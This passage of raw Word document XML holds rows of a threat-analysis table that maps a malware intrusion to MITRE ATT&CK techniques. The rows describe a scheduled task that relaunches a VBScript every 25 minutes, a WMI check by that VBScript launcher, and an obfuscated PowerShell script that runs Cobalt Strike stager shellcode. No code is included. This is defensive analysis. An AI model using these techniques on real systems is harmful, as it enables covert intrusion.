              </w:rPr>
              <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0279ABAB" w14:textId="11500907" w:rsidR="004F28B4" w:rsidRDefault="00113135" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D34A286" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EF00C19" w14:textId="7E81061D" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10BB7EE3" w14:textId="06E50A87" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="007807AE" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03FF940D" w14:textId="034E2A0C" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="007807AE" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3412">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Also, the script creates a named schedule task for persistence to launch </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3412">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>“58d2a83f7778d5.36783181.vbs” every 25 minutes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00794624" w:rsidRPr="00B857D7" w14:paraId="7E7039BD" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E8359A2" w14:textId="3C2A0679" w:rsidR="00794624" w:rsidRDefault="00794624" w:rsidP="00794624">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70127D7B" w14:textId="106C4BAD" w:rsidR="00794624" w:rsidRPr="0067433A" w:rsidRDefault="00794624" w:rsidP="00794624">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1064CB87" w14:textId="259FE15A" w:rsidR="00794624" w:rsidRPr="008B3AF0" w:rsidRDefault="00794624" w:rsidP="00794624">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05E0A6A1" w14:textId="59A9C6DB" w:rsidR="00794624" w:rsidRDefault="00794624" w:rsidP="00794624">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="166524E4" w14:textId="77777777" w:rsidR="00794624" w:rsidRPr="00B857D7" w:rsidRDefault="00794624" w:rsidP="00794624">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4144ED5C" w14:textId="4B07CF63" w:rsidR="00794624" w:rsidRDefault="00794624" w:rsidP="00794624">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C52B48C" w14:textId="05ABE222" w:rsidR="00794624" w:rsidRPr="00B857D7" w:rsidRDefault="00794624" w:rsidP="00794624">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BE51555" w14:textId="68B5502A" w:rsidR="00794624" w:rsidRPr="00B857D7" w:rsidRDefault="00794624" w:rsidP="00794624">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00794624">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00256E4B" w:rsidRPr="00B857D7" w14:paraId="17912D8D" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35AEF716" w14:textId="1BA59376" w:rsidR="00256E4B" w:rsidRDefault="00256E4B" w:rsidP="00256E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1449C735" w14:textId="1DA87C82" w:rsidR="00256E4B" w:rsidRPr="00B857D7" w:rsidRDefault="00256E4B" w:rsidP="00256E4B">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333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D6C0947" w14:textId="63BD45B7" w:rsidR="00256E4B" w:rsidRPr="00031F26" w:rsidRDefault="00256E4B" w:rsidP="00256E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A3361C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A3361C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1027</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A3361C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64ACDE81" w14:textId="6DA3CE1A" w:rsidR="00256E4B" w:rsidRDefault="00256E4B" w:rsidP="00256E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56E0E27D" w14:textId="77777777" w:rsidR="00256E4B" w:rsidRPr="00B857D7" w:rsidRDefault="00256E4B" w:rsidP="00256E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C5DB745" w14:textId="7C795620" w:rsidR="00256E4B" w:rsidRDefault="00256E4B" w:rsidP="00256E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="024C8E17" w14:textId="55EA0EEC" w:rsidR="00256E4B" w:rsidRDefault="00256E4B" w:rsidP="00256E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DF3A86D" w14:textId="4EDDDA3F" w:rsidR="00256E4B" w:rsidRDefault="00256E4B" w:rsidP="00256E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00256E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00031F26" w:rsidRPr="00B857D7" w14:paraId="55D44FD2" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39C6492A" w14:textId="1A2DE480" w:rsidR="00031F26" w:rsidRDefault="00031F26" w:rsidP="00031F26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00256E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06F19E69" w14:textId="05426108" w:rsidR="00031F26" w:rsidRPr="0067433A" w:rsidRDefault="00031F26" w:rsidP="00031F26">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7E56E6ED" w14:textId="57A5CDB6" w:rsidR="00031F26" w:rsidRPr="008B3AF0" w:rsidRDefault="00031F26" w:rsidP="00031F26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00031F26">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00031F26">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1059</w:t>
            </w:r>
            <w:r w:rsidR="00361502">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00361502">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00031F26">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66E6088F" w14:textId="419A1955" w:rsidR="00031F26" w:rsidRDefault="00031F26" w:rsidP="00031F26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21E33689" w14:textId="77777777" w:rsidR="00031F26" w:rsidRPr="00B857D7" w:rsidRDefault="00031F26" w:rsidP="00031F26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24AFDE6B" w14:textId="5FD2D411" w:rsidR="00031F26" w:rsidRDefault="00031F26" w:rsidP="00031F26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09F46EA4" w14:textId="361E72C9" w:rsidR="00031F26" w:rsidRPr="00B857D7" w:rsidRDefault="00031F26" w:rsidP="00031F26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01452CCC" w14:textId="3D4D9176" w:rsidR="00031F26" w:rsidRPr="00B857D7" w:rsidRDefault="00031F26" w:rsidP="00031F26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[1] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00361502" w:rsidRPr="00B857D7" w14:paraId="6A64AA00" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D76CE58" w14:textId="0D8FB41C" w:rsidR="00361502" w:rsidRDefault="00361502" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11D6CF8D" w14:textId="7BB19A77" w:rsidR="00361502" w:rsidRPr="0067433A" w:rsidRDefault="00361502" w:rsidP="004F28B4">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78E515EE" w14:textId="37538F7F" w:rsidR="00361502" w:rsidRPr="008B3AF0" w:rsidRDefault="00361502" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00031F26">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00031F26">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1059</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00031F26">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07875722" w14:textId="01CBBE79" w:rsidR="00361502" w:rsidRDefault="00361502" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E2656A4" w14:textId="77777777" w:rsidR="00361502" w:rsidRPr="00B857D7" w:rsidRDefault="00361502" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FD6C09F" w14:textId="0056D85D" w:rsidR="00361502" w:rsidRDefault="00361502" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CA87517" w14:textId="4004A621" w:rsidR="00361502" w:rsidRPr="00B857D7" w:rsidRDefault="00361502" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="740DDFA0" w14:textId="77777777" w:rsidR="00C91DAD" w:rsidRDefault="00361502" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00361502">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
